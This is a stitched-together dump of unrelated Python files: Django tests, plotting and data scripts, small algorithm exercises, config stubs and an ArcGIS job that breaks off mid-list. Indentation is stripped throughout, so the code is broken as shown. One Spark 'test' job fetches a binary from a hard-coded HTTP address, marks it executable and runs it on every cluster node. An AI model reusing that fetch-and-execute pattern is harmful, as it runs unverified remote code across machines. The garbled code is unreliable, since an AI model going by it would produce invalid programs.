factor1=str(int)
ten ={
"1":"ten",
"2":"twenty",
"3":"thirty",
"4":"forty",
"5":"fifty",
"6":"sixty",
"7":"seventy",
"8":"eighty",
"9":"ninety",
"0":""
}
hundred = {
"1":"one",
"2":"two",
"3":"three",
"4":"four",
"5":"five",
"6":"six",
"7":"seven",
"8":"eight",
"9":"nine",
"0":""
}
factor = factor1[::-1]
if len(factor)==3:
english_text ="{} {} {}".format(hundred[factor[2]]+" hundred and",ten[factor[1]],hundred[factor[0]])
elif len(factor)==2:
english_text ="{} {}".format(ten[factor[1]],hundred[factor[0]])
else:
english_text ="{}".format(hundred[factor[0]])
return factor1, english_text
if __name__ == '__main__':
a = raw_input("enter the value")
print func(a) |
from django.utils import timezone
from consents.models import Consent, Person, Term
from consents.tests.base import ConsentTestBase
class TestTermModel(ConsentTestBase):
def setUp(self) -> None:
super().setUp()
self.person1 = Person.objects.create(
personal="Harry", family="Potter", email="hp@magic.uk"
)
self.person2 = Person.objects.create(
personal="Ron",
family="Weasley",
email="rw@magic.uk",
username="rw",
)
def test_unset_consents_are_created_on_term_create(self) -> None:
term1 = Term.objects.create(
content="term1",
slug="term1",
)
consents = Consent.objects.filter(term=term1)
self.assertEqual(len(consents), 2)
consent1 = consents.filter(person=self.person1)[0]
self.assertIsNone(consent1.term_option)
self.assertIsNone(consent1.archived_at)
consent2 = consents.filter(person=self.person2)[0]
self.assertIsNone(consent2.term_option)
self.assertIsNone(consent2.archived_at)
# Update the term; new consents should not change
term1.content = "New content"
term1.save()
consents = Consent.objects.filter(term=term1)
self.assertEqual(len(consents), 2)
consent1 = consents.filter(person=self.person1)[0]
self.assertIsNone(consent1.term_option)
self.assertIsNone(consent1.archived_at)
consent2 = consents.filter(person=self.person2)[0]
self.assertIsNone(consent2.term_option)
self.assertIsNone(consent2.archived_at)
def test_unset_consents_are_created_on_person_create(self) -> None:
term1 = Term.objects.create(
content="term1",
slug="term1",
)
person3 = Person.objects.create(
personal="Hermione",
family="Granger",
email="hg@magic.uk",
username="hg",
)
consents = Consent.objects.filter(term=term1)
self.assertEqual(len(consents), 3)
consent1 = consents.filter(person=self.person1)[0]
self.assertIsNone(consent1.term_option)
self.assertIsNone(consent1.archived_at)
consent2 = consents.filter(person=self.person2)[0]
self.assertIsNone(consent2.term_option)
self.assertIsNone(consent2.archived_at)
consent3 = consents.filter(person=person3)[0]
self.assertIsNone(consent3.term_option)
self.assertIsNone(consent3.archived_at)
# When person is updated consents do not change
person3.middle = "middle"
person3.save()
consents = Consent.objects.filter(term=term1)
self.assertEqual(len(consents), 3)
consent1 = consents.filter(person=self.person1)[0]
self.assertIsNone(consent1.term_option)
self.assertIsNone(consent1.archived_at)
consent2 = consents.filter(person=self.person2)[0]
self.assertIsNone(consent2.term_option)
self.assertIsNone(consent2.archived_at)
consent3 = consents.filter(person=person3)[0]
self.assertIsNone(consent3.term_option)
self.assertIsNone(consent3.archived_at)
def test_unset_consents_are_created_on_person_create_archived_term(self) -> None:
term1 = Term.objects.create(
content="term1", slug="term1", archived_at=timezone.now()
)
person3 = Person.objects.create(
personal="Hermione",
family="Granger",
email="hg@magic.uk",
username="hg",
)
consents = Consent.objects.filter(term=term1)
self.assertEqual(len(consents), 3)
consent1 = consents.filter(person=self.person1)[0]
self.assertIsNone(consent1.term_option)
self.assertEqual(consent1.archived_at, term1.archived_at)
consent2 = consents.filter(person=self.person2)[0]
self.assertIsNone(consent2.term_option)
self.assertEqual(consent2.archived_at, term1.archived_at)
consent3 = consents.filter(person=person3)[0]
self.assertIsNone(consent3.term_option)
self.assertEqual(consent3.archived_at, term1.archived_at)
# When person is updated consents do not change
person3.middle = "middle"
person3.save()
consents = Consent.objects.filter(term=term1)
self.assertEqual(len(consents), 3)
consent1 = consents.filter(person=self.person1)[0]
self.assertIsNone(consent1.term_option)
self.assertEqual(consent1.archived_at, term1.archived_at)
consent2 = consents.filter(person=self.person2)[0]
self.assertIsNone(consent2.term_option)
self.assertEqual(consent2.archived_at, term1.archived_at)
consent3 = consents.filter(person=person3)[0]
self.assertIsNone(consent3.term_option)
self.assertEqual(consent3.archived_at, term1.archived_at)
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from scipy.stats import spearmanr, pearsonr
data_after = pd.read_csv('../../data/for_plotting_project/post_processing_YES_filtering_of_3_protein_for_scatterplot_density_12_vs_15.txt', sep="\t", index_col = -2)
data_before = pd.read_csv('../../data/for_plotting_project/post_processing_no_filtering_of_protein_for_scatterplot_density_12_vs_15.txt', sep="\t", index_col = -2)
def scatter(dataframe, ax, title):
jej = dataframe.loc[:,['Jejunum concentration (pmol/mg) H12','Jejunum concentration (pmol/mg) H15']]
j7 = jej.loc[:,'Jejunum concentration (pmol/mg) H12']
j13 = jej.loc[:,'Jejunum concentration (pmol/mg) H15']
r = round(pearsonr(j7, j13)[0], 4)
s = round(spearmanr(j7, j13)[0], 4)
z = np.asarray(dataframe.loc[:,'N: Density_Jejunum concentration (pmol/mg) H15_Jejunum concentration (pmol/mg) H12'])
cax = ax.scatter(j7, j13, c=z, s=20, edgecolor='', cmap = plt.cm.gnuplot2)
ax.text(-10,11,'Pearson R = {0}\nSpearman R = {1}'.format(r, s), fontsize = 9)
#ax.set_xlabel('$log_{10}$ Concentration sample H7(pmol/mg)')
#ax.set_ylabel('$log_{10}$ Concentration sample H13(pmol/mg)')
ax.set_title(title)
return cax
'''
if after != 'yes':
#ax.set_title('Correlation before filtering')
plt.savefig('before.png', format = 'png', dpi = 700)
else:
#ax.set_title('Correlation after filtering')
plt.savefig('after.png', format = 'png', dpi = 700)
'''
fig, (ax1, ax2) = plt.subplots(1, 2, sharey = True, sharex = True, figsize = (10,5))
cax = scatter(data_before, ax1, 'Before filtering')
scatter(data_after, ax2, 'After filtering')
#fig.colorbar(cax)
ax = fig.add_subplot(111, frameon=False) #to override the 'frequency on all, just make a big frequency ax '
plt.tick_params(labelcolor='none', top='off', bottom='off', left='off', right='off')
ax.set_xlabel('$log_{10}$ Concentration sample H7(pmol/mg)', labelpad=10) # Use argument `labelpad` to move label downwards.
ax.set_ylabel('$log_{10}$ Concentration sample H13(pmol/mg)', labelpad= 10)
fig.subplots_adjust(right=0.8)
cbar_ax = fig.add_axes([0.85, 0.15, 0.05, 0.7])
fig.colorbar(cax, cax=cbar_ax)
#plt.tight_layout()
plt.savefig('scatterplot.png', dpi = 700)
#finding r2 avg
'''
c = data_before.loc[:,[n for n in data_before.columns if 'once' in n]]
c_after = data_after.loc[:,[n for n in data_after.columns if 'once' in n]]
def rval(concentrations):
r_vals = [ ]
del concentrations['N: Density_Jejunum concentration (pmol/mg) H15_Jejunum concentration (pmol/mg) H12']
del concentrations['N: Excluded fraction_Jejunum concentration (pmol/mg) H15_Jejunum concentration (pmol/mg) H12']
for x in xrange(len(concentrations.columns)):
for y in xrange(len(concentrations.columns)):
r_vals.append(pearsonr(concentrations.iloc[:,x], concentrations.iloc[:,y])[0])
return (r_vals)
rc = rval(c)
rca = rval(c_after)
print np.mean(rc),'<-- before' , 'after -->' , np.mean(rca)
'''
|
"""
CHIME constants and parameters.
"""
# Sampling frequency
ADC_SAMPLE_RATE = float(800e6)
# Number of samples in the inital FFT in the F-engine.
FPGA_NSAMP_FFT = 2048
FPGA_FRAME_RATE = ADC_SAMPLE_RATE / FPGA_NSAMP_FFT
# f-engine parameters for alias sampling.
FPGA_FREQ0 = ADC_SAMPLE_RATE
FPGA_NFREQ = FPGA_NSAMP_FFT / 2
FPGA_DELTA_FREQ = - ADC_SAMPLE_RATE / FPGA_NSAMP_FFT
|
from pyspark import SparkContext, SparkConf
import os
import subprocess
import tempfile
import urllib2
import sys
JOB_NAME = "Test Spark JOB"
SOURCE_PROGRAM_PATH = "http://192.168.205.44:8000/a.out"
TEMP_PATH = "/tmp/a.out"
LOAD_COUNT = 8
SC = None
def initialize_spark(job_name="SparkJob"):
"""
Configure spark object
:param job_name:
:return: Spark object
"""
# Spark Configuration
conf = SparkConf().setAppName(job_name)
return SparkContext(conf=conf)
def download_file(src_file, dest_file):
"""
Download file to destination location
:param src_file: Path or URL of the file to be downloaded
:param dest_file: Destination of the file to be downloaded
:return: Returns boolean true if successful
"""
response = urllib2.urlopen(src_file)
with open(dest_file, 'wb') as output:
output.write(response.read())
os.system("chmod u+x %s" % dest_file)
return True
def delete_downloaded_file(file_path):
"""
Delete downloaded file
:param file_path:
:return:
"""
if os.path.exists(file_path):
os.remove(file_path)
def run_app(file_path, arguments):
"""
Run the application for simulate test
:param file_path:
:param arguments:
:return:
"""
if not os.path.exists(file_path):
download_file(SOURCE_PROGRAM_PATH, file_path)
popen_list = []
popen_list.append(file_path)
popen_list.extend(arguments)
# Precaution to handle large output
with tempfile.TemporaryFile() as temp_file:
proc = subprocess.Popen(popen_list, stdout=temp_file)
proc.wait()
temp_file.seek(0)
return temp_file.read()
def run_parallel_job(no_of_load):
"""
Run parallel job using spark
:return:
"""
sc = initialize_spark(JOB_NAME)
load_range = range(1, no_of_load+1)
rdd1 = sc.parallelize(load_range).\
map(lambda s: run_app(TEMP_PATH, [str(s)]))
print("\n\nOutput in a list:\n")
print(rdd1.collect())
sc.stop()
def clear_downloaded_file(noof_worker_nodes):
"""
Clear all downloaded file from nodes SOURCE_PROGRAM_PATH = sys.argv[1]
:param noof_worker_nodes:
:return:
"""
sc = initialize_spark(JOB_NAME)
load_range = range(1, noof_worker_nodes + 1)
rdd1 = sc.parallelize(load_range). \
map(lambda s: delete_downloaded_file(TEMP_PATH))
rdd1.count()
print("Old files are removed from the nodes.")
sc.stop()
if __name__ == "__main__":
if len(sys.argv) >= 2:
SOURCE_PROGRAM_PATH = sys.argv[1]
if len(sys.argv) == 3:
LOAD_COUNT = int(sys.argv[2])
clear_downloaded_file(LOAD_COUNT)
run_parallel_job(LOAD_COUNT)
|
# Copyright 2018 BLEMUNDSBURY AI LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sanic import Blueprint
import os
URL_BASE = '/slack'
slack_auth_endpoints = Blueprint('slack_auth_endpoints')
slack_event_endpoints = Blueprint('slack_event_endpoints')
slack_client_id = os.getenv("CAPE_SLACK_CLIENT_ID", "REPLACEME")
slack_client_secret = os.getenv("CAPE_SLACK_CLIENT_SECRET", "REPLACEME")
slack_verification = os.getenv("CAPE_SLACK_VERIFICATION", "REPLACEME")
slack_app_url = os.getenv("CAPE_SLACK_APP_URL", "REPLACEME")
|
#!/usr/bin/env python3
from grole import Grole
import ssl
# Create an SSL context from keys created through e.g. Let's Encrypt or self signing:
# Generate a self signed cert with:
# openssl genrsa -out rootCA.key 4096
# openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 1024 -out rootCA.crt -subj "/CN=root"
# openssl genrsa -out cert.key 2048
# openssl req -new -sha256 -key cert.key -subj "/CN=localhost" -out cert.csr
# openssl x509 -req -in cert.csr -CA rootCA.crt -CAkey rootCA.key -CAcreateserial -out cert.crt -days 500 -sha256
# If using a self signed cert, you can access the server using: curl --cacert rootCA.crt https://localhost:8443
ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ssl_context.load_cert_chain('cert.crt', keyfile='cert.key')
ssl_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
app = Grole()
@app.route('/(.*)?')
def index(env, req):
return 'Is it secret? Is it safe?'
app.run('0.0.0.0', port=8443, ssl_context=ssl_context)
|
from collections import Counter
M,N,K,L,D = map(int, input().split())
row = []
col = []
for _ in range(D):
x,y,p,q = map(int, input().split())
if x==p: col.append(min(y,q))
if y==q: row.append(min(x,p))
c0 = Counter(row).most_common()
c1 = Counter(col).most_common()
k = [x[0] for x in c0]
l = [x[0] for x in c1]
print(" ".join(map(str,sorted(k[:K]))))
print(" ".join(map(str,sorted(l[:L]))))
|
import write_dependencies as wd
def parse_document(sentence_dictionary, event_id, acct_type):
"""
INPUT: dictionary that is output from the Stanford Core Parser using
jsonrpclib
OUTPUT: a list of lists where each sublist represents a dependency and
contains sentence id, both words in the dependency and their part of speech tags
This returns the values to be stored in the database
"""
dependency_store_list =[]
for j in xrange(len(sentence_dictionary)):
dependency_list = []
sentence_id = j
dependencies = sentence_dictionary[j]['dependencies']
word_info = sentence_dictionary[j]['words']
word_list = []
for k in xrange(len(word_info)):
word_list.append(word_info[k][0])
dependency_list = wd.parse_dependencies(dependencies, event_id, acct_type, sentence_id, word_list)
dependency_store_list.append(dependency_list)
return dependency_store_list |
'''
Created on 2013-7-27
@author: Administrator
'''
import urllib,urllib2
from thread_pool import Worker
from thread_pool import WorkerManager
import sys
import framework.tool.FileHandler as FileHandler
def test_job(id, sleep = 0.001 ):
try:
html = urllib.urlopen('http://www.cnproxy.com/proxy%d.html' % (id)).read()
fh = FileHandler.FileHandler("proxy_{%d}.html" % id , "w")
fh.file_put_contents(html)
fh.close()
except:
print '[%4d]' % id, sys.exc_info()[:2]
return id
def test():
import socket
socket.setdefaulttimeout(10)
print 'start testing'
wm = WorkerManager(3)
for i in range(1,11):
wm.add_job( test_job, i, i*0.001 )
wm.wait_for_complete()
print 'end testing'
if __name__ == '__main__' :
test() |
l = int(input())
c = int(input())
if( l % 2 == 0 and c % 2 == 1) or ( l % 2 == 1 and c % 2 == 0) :
print(0)
else:
print(1) |
from unittest.case import TestCase
from unittest import main
from case_converter.utils import convert_to_camel_case, convert_to_underscore
class TestConvertToCamelCase(TestCase):
def test_underscore_to_camel_dict(self):
input_data = {
"9_under_score_4_days": 1,
"a_game_of_thrones": 1
}
expected_output = {
"9UnderScore4Days": 1,
"aGameOfThrones": 1
}
test_output = convert_to_camel_case(input_data)
self.assertEqual(test_output, expected_output)
def test_underscore_to_camel_list(self):
input_data = [
{
"9_under_score_4_days": 1,
"a_game_of_thrones": 1
}
]
expected_output = [
{
"9UnderScore4Days": 1,
"aGameOfThrones": 1
}
]
test_output = convert_to_camel_case(input_data)
self.assertEqual(test_output, expected_output)
def test_underscore_to_camel_tuple(self):
input_data = (
{
"9_under_score_4_days": 1,
"a_game_of_thrones": 1
}
)
expected_output = (
{
"9UnderScore4Days": 1,
"aGameOfThrones": 1
}
)
test_output = convert_to_camel_case(input_data)
self.assertEqual(test_output, expected_output)
def test_underscore_to_camel_str(self):
input_data = "A test string"
test_output = convert_to_camel_case(input_data)
self.assertEqual(test_output, input_data)
def test_underscore_to_camel_nested(self):
input_data = {
"an_underscore_item": 1,
"an_underscore_dict": {
"an_underscore_item": 1,
},
"an_underscore_list": [
{
"an_underscore_item": 1,
},
],
"an_underscore_tuple": (
{
"an_underscore_item": 1,
},
)
}
expected_output = {
"anUnderscoreItem": 1,
"anUnderscoreDict": {
"anUnderscoreItem": 1,
},
"anUnderscoreList": [
{
"anUnderscoreItem": 1,
},
],
"anUnderscoreTuple": (
{
"anUnderscoreItem": 1,
},
)
}
test_output = convert_to_camel_case(input_data)
self.assertEqual(test_output, expected_output)
class TestConvertToUnderscore(TestCase):
def test_camel_to_underscore_dict(self):
input_data = {
"9UnderScore4Days": 1,
"aGameOfThrones": 1
}
expected_output = {
"9_under_score_4_days": 1,
"a_game_of_thrones": 1
}
test_output = convert_to_underscore(input_data)
self.assertEqual(test_output, expected_output)
def test_camel_to_underscore_list(self):
input_data = [
{
"9UnderScore4Days": 1,
"aGameOfThrones": 1
}
]
expected_output = [
{
"9_under_score_4_days": 1,
"a_game_of_thrones": 1
}
]
test_output = convert_to_underscore(input_data)
self.assertEqual(test_output, expected_output)
def test_camel_to_underscore_tuple(self):
input_data = (
{
"9UnderScore4Days": 1,
"aGameOfThrones": 1
}
)
expected_output = (
{
"9_under_score_4_days": 1,
"a_game_of_thrones": 1
}
)
test_output = convert_to_underscore(input_data)
self.assertEqual(test_output, expected_output)
def test_camel_to_underscore_str(self):
input_data = "A test string"
test_output = convert_to_underscore(input_data)
self.assertEqual(test_output, input_data)
def test_camel_to_underscore_nested(self):
input_data = {
"anUnderscoreItem": 1,
"anUnderscoreDict": {
"anUnderscoreItem": 1,
},
"anUnderscoreList": [
{
"anUnderscoreItem": 1,
},
],
"anUnderscoreTuple": (
{
"anUnderscoreItem": 1,
},
)
}
expected_output = {
"an_underscore_item": 1,
"an_underscore_dict": {
"an_underscore_item": 1,
},
"an_underscore_list": [
{
"an_underscore_item": 1,
},
],
"an_underscore_tuple": (
{
"an_underscore_item": 1,
},
)
}
test_output = convert_to_underscore(input_data)
self.assertEqual(test_output, expected_output)
if __name__ == '__main__':
main()
|
import yfinance as yf
import datetime as dt
import pandas as pd
def sixMonthIndex(tickers):
start = dt.datetime.today() - dt.timedelta(180)
end = dt.datetime.today()
cl_price = pd.DataFrame()
for ticker in tickers:
cl_price[ticker]= yf.download(ticker, start, end, period = "6mo")["Adj Close"]
finalList = cl_price.iloc[-1] / cl_price.iloc[0]
finalList.sort_values(ascending = False, inplace = True)
print("6 month Index")
print(finalList)
finalList = finalList[:len(finalList)//3]
return finalList
|
class Node:
def __init__(self, value):
self.data = value
self.left = None
self.right = None
def insert(self, current, new):
if current.data < new.data:
if current.right != None:
self.insert(current.right, new)
else:
current.right = new
if current.data > new.data:
if current.left != None:
self.insert(current.left, new)
else:
current.left = new
def search(self, current, wanted):
if current.data == wanted:
print('There it is!')
return
if current.data < wanted and current.right != None:
self.search(current.right, wanted)
if current.data > wanted and current.left != None:
self.search(current.left, wanted)
def cout(self, current):
if current:
self.cout(current.left)
print(current.data)
self.cout(current.right)
input_array = input("Input:\n").split(' ')
root = Node(int(input_array[0]))
for i in range(1, len(input_array)):
new = Node(int(input_array[i]))
root.insert(root, new)
root.cout(root)
wanted = int(input('What do you want to search for?\n'))
root.search(root, wanted) |
from tkinter import *
HEIGHT = 1000
WIDTH = 1000
from tkinter import ttk
window = Tk()
window.geometry("800x1000")
window.title("42 Opentrons App")
tab_control = ttk.Notebook(window)
tab1 = ttk.Frame(tab_control)
tab2 = ttk.Frame(tab_control)
tab_control.add(tab1, text='Main')
tab_control.add(tab2, text='Camera')
lbl1 = Label(tab1, text= 'label1')
lbl1.grid(column=0, row=0)
lbl2 = Label(tab2, text= 'label2')
lbl2.grid(column=0, row=0)
tab_control.pack(expand=1, fill='both')
window.mainloop()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import dbus
import re
def get_bus():
bus = dbus.SessionBus()
return bus
def get_player(bus):
for service in bus.list_names():
if re.match('org.mpris.MediaPlayer2.', service):
return bus.get_object(service, '/org/mpris/MediaPlayer2')
def list_properties(player):
property_interface = dbus.Interface(player, dbus_interface='org.freedesktop.DBus.Properties')
for property, value in property_interface.GetAll('org.mpris.MediaPlayer2.Player').items():
print(property, ':', value)
def get_curtrack(player):
if not player:
return ""
metadata = player.Get('org.mpris.MediaPlayer2.Player', 'Metadata',
dbus_interface='org.freedesktop.DBus.Properties')
curtrack = "{} - {}".format(
", ".join(metadata.get("xesam:artist")),
metadata.get("xesam:title")
)
return curtrack
def get_playpause(player):
if not player:
return ""
return player.Get('org.mpris.MediaPlayer2.Player', 'PlaybackStatus',
dbus_interface='org.freedesktop.DBus.Properties') == "Playing"
def main():
bus = get_bus()
player = get_player(get_bus())
playing = get_playpause(player)
curtrack = get_curtrack(player)
print "{} - {}".format(
"▶" if playing else "▮▮",
curtrack
)
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
"""Provides a ``CacheableWidgetMixin`` which allows you to construct deform
widgets whose ``values`` are populated dynamically (e.g.: from the db) to
delay actually making db calls until the form they are part of is actually
rendered, and to cache their rendered template output using `Alkey`_.
_Alkey: https://github.com/thruflo/alkey
"""
__all__ = [
'CacheableWidgetMixin',
'CacheableSingleWidget',
'CacheableOptGroupWidget',
'CacheableMultipleSelectGroupsWidget',
'CacheableTypeaheadInputWidget',
]
import logging
logger = logging.getLogger(__name__)
from .widget import ChosenSingleWidget
from .widget import ChosenOptGroupWidget
from .widget import MultipleSelectGroupsWidget as MSGWidget
from .widget import TypeaheadInputWidget
class CacheableWidgetMixin(object):
"""Provides a cacheable `self.serialize(...)`` method and a
``self.get_dynamic_values`` method that:
* starts with ``self._values``
* calls ``self.get_values()``
* prepends ``self._append_values``.
Use by i) mixing into a Widget class (that uses a ``values`` property)
and ii) forcibly overriding the ``values`` property and ``serialize``
method, e.g.::
>>> from deform.widget import SelectWidget # or whatever
>>>
>>> class CacheableSelectWidget(SelectWidget, CacheableWidgetMixin):
... values = property(CacheableWidgetMixin.get_dynamic_values)
... serialize = CacheableWidgetMixin.serialize
...
Then when you're instantiating the widget, pass in a ``get_values``
callable, instead of a ``values`` list, e.g.::
>>> widget = SomeCacheableWidget(get_values=lambda: ['a'])
>>> widget.values
['a']
You can also provide a static ``_values`` list and a list of values to
append *after* the values have been got by calling ``get_values``, e.g.::
>>> widget = SomeCacheableWidget(_values='a', get_values=lambda: ['b'],
... _append_values=['c'])
>>> widget.values
['a', 'b', 'c']
The point of all of this being to delay populating the widget's values
until the widget is serialized. Instead of passing a rendered ``form``
through to the template, as per the standard ``pyramid_deform.FormView``
api, we pass through a ``render_form`` function, which delays db query
execution to within the template scope, which makes them cacheable, i.e.:
if the template out is cached, next time the cache hits, the db call
won't be made.
If you would like to actually cache the widget's rendered template (as
opposed to just allowing the rendered form to be cached without hitting
the db) you can integrate with `Alkey <https://github.com/thruflo/alkey>`_
by passing in a ``request`` when instantiating the widget and providing
a ``cache_key_args`` list as a kwarg.
For example, using colander.deferred with a form that's bind to the
request as per ``.form.FormView``::
from myapp.model import User
@colander.deferred
def user_widget(node, kw):
request = kw['request]
cache_key_args = ('myapp.user_widget', User)
get_values = lambda: User.query.order_by(User.name).all()
return CacheableSingleWidget(request=request, get_values=get_values,
cache_key_args=cache_key_args)
What we get here is a single select widget that's populated with values
from the database and cached with a cache key that will invalidate when
any change is made to the users table (when a user is inserted, updated
or deleted) *and* will vary when the user input (the `cstruct` passed
to the widget's `serialize` method.) changes.
"""
_values = []
_append_values = []
def get_values(self):
"""Override this method by passing a ``get_values`` kw to the
widget constructor.
"""
return []
def get_dynamic_values(self):
"""Standard logic to construct the widget values."""
# Start with an empty list.
values = []
# If a static list of values was provided, use that.
if self._values:
values.extend(self._values)
# If a dynamic function to get values was provided, extend the values
# with its return value.
get_values = getattr(self, 'get_values', None)
if callable(get_values):
values.extend(get_values())
# If a list of values to append was provided, do so.
if self._append_values:
values.extend(self._append_values)
# Return the list of values.
return values
def serialize(self, field, cstruct, **kw):
"""We do the default, as per the super class but, iff a ``cache_key_args``
have been provided, we cache the output using Alkey's
``request.cache_key`` method.
"""
# Prepare a function that returns the serialized value.
default_serialize = super(self.__class__, self).serialize
serialize = lambda: default_serialize(field, cstruct, **kw)
# If we weren't passed any cache key args, walk away.
key_args = getattr(self, 'cache_key_args', None)
if not key_args:
return serialize()
# Otherwise get the cache key and use it to cache the output.
request = self.request
cache_key = request.cache_key(1, self.template, cstruct, *key_args)
cache_decorator = request.cache_manager.cache(cache_key)
cached_serialize = cache_decorator(serialize)
return cached_serialize()
class CacheableSingleWidget(ChosenSingleWidget, CacheableWidgetMixin):
"""Extend the ``ChosenSingleWidget`` with a cacheable values property."""
values = property(CacheableWidgetMixin.get_dynamic_values)
serialize = CacheableWidgetMixin.serialize
class CacheableOptGroupWidget(ChosenOptGroupWidget, CacheableWidgetMixin):
"""Extend the ``ChosenOptGroupWidget`` with a cacheable values property."""
values = property(CacheableWidgetMixin.get_dynamic_values)
serialize = CacheableWidgetMixin.serialize
class CacheableMultipleSelectGroupsWidget(MSGWidget, CacheableWidgetMixin):
"""Extend the ``MSGWidget`` with a cacheable values property."""
values = property(CacheableWidgetMixin.get_dynamic_values)
serialize = CacheableWidgetMixin.serialize
class CacheableTypeaheadInputWidget(TypeaheadInputWidget, CacheableWidgetMixin):
"""Extend the ``TypeaheadInputWidget`` with a cacheable values property."""
values = property(CacheableWidgetMixin.get_dynamic_values)
serialize = CacheableWidgetMixin.serialize
|
"""
单词接龙
给定两个单词(beginWord 和 endWord)和一个字典,找到从 beginWord 到 endWord 的最短转换序列的长度。转换需遵循如下规则:
每次转换只能改变一个字母。
转换过程中的中间单词必须是字典中的单词。
说明:
如果不存在这样的转换序列,返回 0。
所有单词具有相同的长度。
所有单词只由小写字母组成。
字典中不存在重复的单词。
你可以假设 beginWord 和 endWord 是非空的,且二者不相同。
示例 1:
输入:
beginWord = "hit",
endWord = "cog",
wordList = ["hot","dot","dog","lot","log","cog"]
输出: 5
解释: 一个最短转换序列是 "hit" -> "hot" -> "dot" -> "dog" -> "cog",
返回它的长度 5。
示例 2:
输入:
beginWord = "hit"
endWord = "cog"
wordList = ["hot","dot","dog","lot","log"]
输出: 0
解释: endWord "cog" 不在字典中,所以无法进行转换。
"""
from collections import deque
class Solution(object):
def ladderLength(self, beginWord, endWord, wordList):
"""
本质上也是在找路径,所以可以使用BFS,把当前位置能到达的字典内的单词加入队列
然后出队列向前走一步,即转换一次
记录层次,可以把每次加入队列的元素设置成[value, level]的结构
那怎么记录路径呢?
:type beginWord: str
:type endWord: str
:type wordList: List[str]
:rtype: int
"""
if endWord not in wordList:
return 0
transforms = deque()
transforms.append([beginWord, 1])
while len(transforms) > 0:
word, count = transforms.popleft()
for w in wordList:
if self.canTransform(w, word):
transforms.append([w, count+1])
if w == endWord:
return count + 1
wordList.remove(w)
return 0
def canTransform(self, word1, word2):
c = 0
for i in range(len(word1)):
if word1[i] != word2[i]:
c += 1
return True if c == 1 else False
so = Solution()
print(so.ladderLength(beginWord="hit", endWord="cog",
wordList=["hot", "dot", "dog", "lot", "log", "cog"]))
|
import pandas as pd
import pickle
from sklearn.externals import joblib
from sklearn import preprocessing
from ..config import develop as default_config
features = '''
สวัสดี
อะไร
ยังไง
เมื่อไหร่
บาย
'''
def get_feature(messages):
features_result = {}
features_count = 0
for feature in features:
pattern = feature
for message, score in messages:
matches = pattern in message
if matches:
try:
features_result[feature] += 1 * score
except KeyError:
features_result[feature] = 1 * score
features_count = features_count + 1
else:
try:
features_result[feature] += 0
except KeyError:
features_result[feature] = 0
features_result['feature_not_found'] = 1 if features_count == 0 else 0
return features_result
def build_model():
data = []
training = pd.read_csv(default_config.BASE_DIR + '/data/data.csv')
for messages in training:
features_result = get_feature([
(messages, 1),
])
data.append(features_result)
df = pd.DataFrame(data=data)
x_data = df[features]
scaler = preprocessing.Normalizer().fit(x_data)
x_data = scaler.transform(x_data)
y_data = df['class']
from sklearn.linear_model import LogisticRegression
model = LogisticRegression()
model.fit(x_data, y_data)
model.score(x_data, y_data)
pickle.dump(scaler, open(default_config.BASE_DIR + '/data/scaler.p', 'wb'))
joblib.dump(model, default_config.BASE_DIR + '/data/current_model.pkl')
def get_result(messages):
scaler = pickle.load(open(default_config.BASE_DIR + '/data/scaler.p', 'rb'))
pca = pickle.load(open(default_config.BASE_DIR + '/data/pca.p', 'rb'))
model = joblib.load(default_config.BASE_DIR + '/data/current_model.pkl')
test_data = [get_feature([(messages, 1)])]
x_test = pd.DataFrame(data=test_data)[features]
x_test = scaler.transform(x_test)
x_test = pca.transform(x_test)
predicted = model.predict(x_test)
return predicted
|
import urllib.request
import json
from urllib.parse import urlencode, quote_plus
serviceurl = 'http://py4e-data.dr-chuck.net/json?'
while True:
address = input('Enter location: ')
if len(address) < 1 : break
url = serviceurl + urlencode({'sensor':'false', 'address': address})
print ('Retrieving', url)
uh = urllib.request.urlopen(url)
data = uh.read()
print ('Retrieved',len(data),'characters')
try: js = json.loads(str(data))
except: js = None
if 'status' not in js or js['status'] != 'OK':
print ('==== Failure To Retrieve ====')
print (data)
continue
location = js['results'][0]['place_id']
print ('Place id', location) |
# RecreateDistributionAreaPolygon.py
# Create DistributionArea polygon feature class
# Copy it into the production database.
# This program is run monthly on Arctic as a scheduled task
#
# This program can only run successfully when
# a connection can be created to the production database
#
# The DistributionArea feature class does not reside in a dataset for two reasons:
# (1) Since it does not have to be versioned for editing, it does not have to
# reside in a versioned feature class.
# (2) Since it is updated programmatically, it must not reside in a dataset that
# is locked when services are running.
# 2013-04-05 BLG:
# - Only include mains where Subsystem = 'Distribution'
# - Increase buffer zone distance from 100 feet to 500 feet
# - Do not eliminate holes from polygons
import arcgisscripting, datetime, os, smtplib, sys
gp = arcgisscripting.create()
# Production database - read, update.
N = r'\\Arctic\GIS_Data'
SDE = N + r'\GIS_Private\DataResources\DBA\Datasets\Export\Interfaces\Connections\Conway_sdeVector_sdeDataOwner.sde'
SDE_wPressurizedMain = SDE + r'\sdeVector.sdeDataOwner.WaterUtility\sdeVector.sdeDataOwner.wPressurizedMain'
SDE_DistributionArea = SDE + r'\sdeVector.sdeDataOwner.DistributionArea'
# Temporary database - create, update, delete.
GDB = r'C:\GIS_Development\DataResources\DBA\Datasets\Export\Data\Databases'
GDB_DatabaseName = r'DistributionArea.gdb'
GDB_Database = GDB + r'\\' + GDB_DatabaseName
GDB_DistributionMain = GDB_Database + r'\DistributionMain'
GDB_DistributionArea = GDB_Database + r'\DistributionArea'
# Status report email.
MailServer = 'nnww-smtp.nnww.nnva.gov'
MailSender = '%s <%s@nnva.gov>' % (os.environ['USERNAME'], os.environ['USERNAME']) # 'GisAdmin <GisAdmin@nnva.gov>'
MailRecipientsIfSuccess = ['Marietta Washington <mvwashington@nnva.gov>',
'Brian Kingery <bkingery@nnva.gov>',
'Barbara Gates <bgates@nnva.gov>']
MailRecipientsIfError = ['Marietta Washington <mvwashington@nnva.gov>',
'Brian Kingery <bkingery@nnva.gov>',
